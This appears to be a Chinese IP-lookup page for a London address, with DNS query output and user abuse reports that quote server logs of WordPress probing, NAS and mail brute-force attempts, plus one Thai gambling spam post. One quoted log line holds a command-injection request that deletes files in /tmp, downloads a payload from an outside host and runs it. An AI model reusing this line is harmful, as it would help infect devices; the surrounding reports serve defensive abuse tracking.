必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): London

省份(region): England

国家(country): United Kingdom

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 20.68.190.8
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 11988
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;20.68.190.8.			IN	A

;; AUTHORITY SECTION:
.			589	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2023091903 1800 900 604800 86400

;; Query time: 61 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Sep 20 08:06:19 CST 2023
;; MSG SIZE  rcvd: 104
HOST信息:
Host 8.190.68.20.in-addr.arpa. not found: 3(NXDOMAIN)
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 8.190.68.20.in-addr.arpa: NXDOMAIN
相关IP信息:
最新评论:
IP 类型 评论内容 时间
87.249.132.22 attack
Trying to login to my Qnap NAS.
Nas is not available from the internet on standard ports.
2022-04-03 19:03:05
185.63.253.200 spambotsattackproxynormal
Ndak tau
2022-04-23 11:31:56
165.22.107.85 spamattack
165.22.107.85
165.22.107.85
[19/Apr/2022 05:37:32] "GET / HTTP/1.1" 200 3140
[19/Apr/2022 05:37:33] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:33] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:34] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:34] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:35] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:35] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:36] "GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:36] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:37] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:37] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:38] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:38] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:39] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:39] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:37:40] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 179
[19/Apr/2022 05:38:25] code 400, message Bad request syntax ('GET /shell?cd+/tmp;rm+-rf+*;wget+ tigoinari.tk/jaws;sh+/tmp/jaws HTTP/1.1')
[19/Apr/2022 05:38:25] "GET /shell?cd+/tmp;rm+-rf+*;wget+ tigoinari.tk/jaws;sh+/tmp/jaws HTTP/1.1" 400 -
2022-04-19 14:04:52
91.240.118.37 spamattackproxy
Digging into my bios sys
2022-03-26 13:53:28
46.187.229.41 attack
polyvvord
2022-04-07 19:52:00
128.199.73.245 spam
Rosalie เรา คือ สล็อตเว็บใหญ่ ที่เปิดให้บริการ slot pg เป็น PG 
สล็อตเว็บตรง แหล่งรวมเกม SLOTPG 
มากกว่า 200 เกม เว็บเกมสล็อต 
ยอดนิยมอันดับ หนึ่ง ฝากเงิน ถอนเงิน ด้วย ระบบ ออโต้ ช่วยให้ การฝากเงิน - ถอนเงิน ของท่าน ปลอดภัย รวดเร็วทันใจ ภายใน 
45 วินาที ร่วมสนุกกับ PGSLOT ได้อย่างไร้ขีดจำกัด สมัคร เว็บตรงพีจีสล็อต ตอนนี้ รับโปรโมชั่น สล็อตพีจี ต่างๆมากมาย มีโหมดPG SLOT DEMO ให้ทุกท่าน ได้ทดลองเล่น SLOT PG ก่อนวางเดิมพันด้วยเงินจริง เครดิตฟรี 10,000 บาท เปิดให้บริการ pgslot บน สล็อตพีจีเว็บตรง 
ตลอด 24 ชม. ร่วมสัมผัสประสบการณ์ใหม่กับ PGSLOT 
ที่ เว็บใหญ่สล็อต กับทางทีมงาน สล็อตพีจีเว็บตรง ได้อย่างไร้ขีดจำกัด
2022-03-26 02:55:33
87.249.132.19 normal
several QNAP-login attempts as user admin
2022-04-03 19:14:09
37.120.213.100 attack
Try to access my NAS a few times.
2022-04-22 19:46:54
5.34.207.81 spamattack
The IP address [5.34.207.81] experienced 4 failed attempts when attempting to log in to Mail Server running on NAS within 10 minutes, and was blocked at 04/04/2022 12:00.
2022-04-05 04:41:59
93.49.2.47 spambotsattackproxynormal
93.49.2.47
2022-03-27 07:38:26
185.63.253.200 proxy
185.63.253.200
2022-04-07 01:08:31
87.249.132.19 attack
Several QNAP-login attempts as user admin
2022-04-08 19:19:37
120.79.222.140 spam
yutube
2022-04-22 20:11:51
212.70.149.72 bots
Apr 21 11:17:27 mail dovecot: auth: passwd-file(tata@example.com,212.70.149.72): unknown user (SHA1 of given password: b3aca9)
Apr 21 11:17:29 mail postfix/smtps/smtpd[1933]: warning: unknown[212.70.149.72]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Apr 21 11:17:34 mail postfix/smtps/smtpd[1933]: lost connection after AUTH from unknown[212.70.149.72]
Apr 21 11:17:34 mail postfix/smtps/smtpd[1933]: disconnect from unknown[212.70.149.72] ehlo=1 auth=0/1 rset=1 commands=2/3
Apr 21 11:18:31 mail postfix/smtps/smtpd[1933]: connect from unknown[212.70.149.72]
Apr 21 11:18:41 mail postfix/smtps/smtpd[1933]: Anonymous TLS connection established from unknown[212.70.149.72]: TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)
Apr 21 11:19:09 mail dovecot: auth: passwd-file(cent@example.com,212.70.149.72): unknown user (SHA1 of given password: b3aca9)
Apr 21 11:19:11 mail postfix/smtps/smtpd[1933]: warning: unknown[212.70.149.72]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Apr 21 11:19:16 mail postfix/smtps/smtpd[1933]: lost connection after AUTH from unknown[212.70.149.72]
Apr 21 11:19:16 mail postfix/smtps/smtpd[1933]: disconnect from unknown[212.70.149.72] ehlo=1 auth=0/1 rset=1 commands=2/3
Apr 21 11:22:36 mail postfix/anvil[1450]: statistics: max connection rate 1/60s for (smtps:212.70.149.72) at Apr 21 11:13:35
Apr 21 11:22:36 mail postfix/anvil[1450]: statistics: max connection count 1 for (smtps:212.70.149.72) at Apr 21 11:13:35
Apr 21 11:22:36 mail postfix/anvil[1450]: statistics: max cache size 1 at Apr 21 11:13:35
2022-04-21 11:26:44
45.95.147.43 attack
brute force tries
2022-03-28 03:31:59

最近上报的IP列表

213.161.234.27 152.116.210.194 166.182.77.71 146.70.171.245
68.235.43.101 198.44.136.137 43.225.189.146 206.21.25.67
210.63.41.173 11.164.60.52 6.5.53.215 2.118.116.38
66.44.107.4 103.157.96.41 190.18.150.10 154.28.188.32
74.81.152.104 89.49.171.154 175.130.8.58 62.46.214.220